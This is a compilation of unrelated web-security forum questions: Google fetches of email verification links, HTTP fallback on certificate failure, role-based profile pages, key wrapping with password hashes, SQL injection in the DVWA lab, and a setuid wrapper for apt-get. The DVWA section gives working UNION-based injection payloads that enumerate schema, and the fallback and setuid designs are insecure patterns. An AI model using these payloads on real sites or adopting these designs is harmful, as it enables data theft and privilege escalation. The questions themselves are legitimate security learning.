Suspicious behavior by Google when verifying users via nodejs

I’m building a user authentication system in Nodejs and use a confirmation email to verify a new account is real.

The user creates an account, which prompts him/her to check the email for a URL that he/she clicks to verify the account.

It works great, no issues.

What’s unusual is that in testing, when I email myself (to simulate the new user process), and after I click the verify-URL, immediately afterward there are two subsequent connections to the endpoint. Upon inspection, it appears the source IPs belong to Google. What’s even more interesting is that the user agent strings are random versions of Chrome.

Here’s an example of the last sequence. The first one is the HTTP 200 request and the next two — the HTTP 400s are Google. (I remove upon user verification the user’s verification code from the database so that subsequence requests are HTTP 400s.) - - [03/Jul/2020:20:35:40 +0000] "GET /v1/user/verify/95a546cf7ad448a18e7512ced322d96f HTTP/1.1" 200 70 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "" "" "US" "en-US,en;q=0.9" - - [03/Jul/2020:20:35:43 +0000] "GET /v1/user/verify/95a546cf7ad448a18e7512ced322d96f HTTP/1.1" 400 28 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "" "" "US" "en-US,en;q=0.9" - - [03/Jul/2020:20:35:43 +0000] "GET /v1/user/verify/95a546cf7ad448a18e7512ced322d96f HTTP/1.1" 400 28 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36" "" "" "US" "en-US,en;q=0.9" 

Now I’m using Cloudflare so the first IP address in each line is a Cloudflare IP address but the second one you see is the real one [as reported by Cloudflare] … I modified my "combined" log format in Nginx.

Anyhow, any idea what this is? Or why Google would be doing this?

It’s just incredibly suspicious given the use of randomized user agent strings.

And one last note, if I inspect my console w/Chrome and go into the network tab before I click a verification link from my email, the 2 subsequent connections never come. It’s like Google knows I’m monitoring … this is just so incredibly odd that I had to ask the community. I’m thinking maybe this is an extension that’s infected w/some kind of tracking, but how then do the IPs come back as Google?

Best guidance for allowing users to connect via HTTP in case of a certificate error

I’ve coded my app to use https, but if a https transaction fails for any reason, I assume it’s because the server isn’t configured for https, and thereafter start all transactions with http. Seems like that’s a vulnerability. Likewise, a script kiddie using a proxy to intercept the traffic on his client hardware would be able to make all https transactions fail.

I’m told that if someone tries to MITM your app’s HTTPS request then the request should fail (invalid certificate) and your app should fail with an error, not fallback to HTTP. In a world where SSL is reliably available, sure, but maintaining valid SSL certs is a task in itself. For example, letsencrypt recently revoked some of their certificates and forced renewal of same because of some security problem. Aside from revocations, certs are short term and have to be renewed, and the renewal process involves a lot of stitchware, and can fail. If SSL goes down, I don’t want my site to go dark.

What is the best guidance for either:

  1. More reliably maintaining certificates (such that if they do fail, the resulting downtime falls within the "five nines" SLA unavailability window) without it being such a manual headache, or

  2. Allowing the site to continue to work if SSL has failed? Is it easy to allow most activity to proceed using http, but allow known-critical transactions to require https.

Note that no browsers are involved in the scenarios that concern me.

how to create user profile pages and display them based on users roles

Example: I have a website with 3 different user roles (amongst others): *developers *designers *contributors

I would like to have profile pages for users and would like to be able to display users on pages based (filtered) by their role. Hope this is clear. I have researched quite a few membership plugins and found that they are just bloated with features and ended up with TMI and no answers/solutions, so if you can help I would appreciate it. Do you know of any plugins suitable of doing that?

Thanx in advance

Using the hash of the user’s password for encrypting/decrypting an E2E encryption/decryption key: is this good practice? [migrated]

I am developing a zero-knowledge app, meaning the data is encrypted in the client before it’s transmitted (over SSL) and decrypted after the data is received. If the database is ever compromised, without the user’s decryption keys the attacker knows nothing.

Of course, when the app is hosted on a web server, an attacker could still inject malicious scripts, but that’s always a risk. The idea is that the user data is encrypted by default. As long as no malicious code was added to the client code, the server should not be able to obtain the user data.

The title summarises how I intended to do this, but actually it’s a bit more convoluted:

  • On account registration, a secure random string is generated as (AES) encryption key (could also be private/public key generation here I guess). Let’s call this key K1.
    • All data will be encrypted/decrypted (e.g. using AES) with this key.
  • The plain text password is hashed to create another key. Let’s call this K2 = hash(plain password) (for example using SHA256)
    • K2 is used to encrypt K1 for secure storage of the key in the remote database in the user profile.
    • If the user changes his password, all that needs to be done is re-encrypting K1 with K2 = hash(new password), so not all the data has to be decrypted and re-encrypted.
    • K2 is stored in localStorage as long as the user is authenticated: this is used to decrypt K1 at bootstrap.
  • K2 is hashed again to generate the password that is sent to the API: P = hash(K2) (also using SHA256 for example)
    • This is to prevent that the decryption key K2 (and therefore, K1) can be deduced from the password that the API/database receives.
  • In the API, the password P that is received is hashed again before it is compared/stored in the database (this time with a stronger function such as bcrypt).

My question is: does this mechanism make sense or are there any gaping security holes that I missed?

The only downsides that I see are inherent to zero-knowledge, E2E encrypted apps:

  • Forgotten password = all data is lost (cannot be decrypted). This is why the user is recommended to write down the encryption key K1 after creating the account: then the data can always be recovered.
  • Searching, indexing, manipulating, analysing the data is limited because everything has to be done client-side.

DVWA SQLi: How to get column names from table “users” only? [closed]

This is DVWA database. There are only 2 tables in it.

mysql> show tables;  +----------------+ | Tables_in_dvwa | +----------------+ | guestbook      |  | users          |  +----------------+ 2 rows in set (0.00 sec)  mysql>  

I’ve no issue getting these 2 tables via SQL injection bug' UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=DATABASE() -- -&Submit=Submit# 

Output in web (TABLE_NAME in “dvwa” DATABASE)

First name: guestbook,users 

Table “users” looks interesting and would like to know all columns in it.

There are 6 columns as shown in MySQL query below.

mysql> SELECT * FROM users; +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ | user_id | first_name | last_name | user    | password                         | avatar                                                | +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ |       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 |   |  |       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | |  |       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b |    |  |       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 |   |  |       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 |  |  +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ 5 rows in set (0.00 sec)  mysql>  

However, my next attempt to get only columns from table users didn’t work well.' UNION SELECT GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_schema=DATABASE() -- -&Submit=Submit# 

Output in web

First name: comment_id,comment,name,user_id,first_name,last_name,user,password,avatar 

The problem is columns comment_id,comment,name are not part of users table.

What’s wrong in this SQLi syntax and how do I get only column names from table users only.


First name: user_id,first_name,last_name,user,password,avatar 

What are the potential vulnerabilities of allowing non-root users to run apt-get?

There are two ways I can think of doing this:

  1. On a system with sudo, by modifying /etc/sudoers.

  2. On a system without sudo (such as a Docker environment), by writing a program similar to the below and setting the setuid bit with chmod u+s. apt-get checks real uid, so a setuid call is necessary.

... int main(int argc, char **argv) {     char *envp[] = { ... };     setuid(0);     execve("/usr/bin/apt-get", argv, envp);     return 1; } 

I have two questions:

  1. What are the potential vulnerabilities of allowing non-root users to run apt-get?
  2. My goal is to allow people to install/remove/update packages, given that apt-get lives in a custom non-system refroot and installs from a custom curated apt repository. Are there safer ways to allow non-root users to run apt-get on a system without sudo?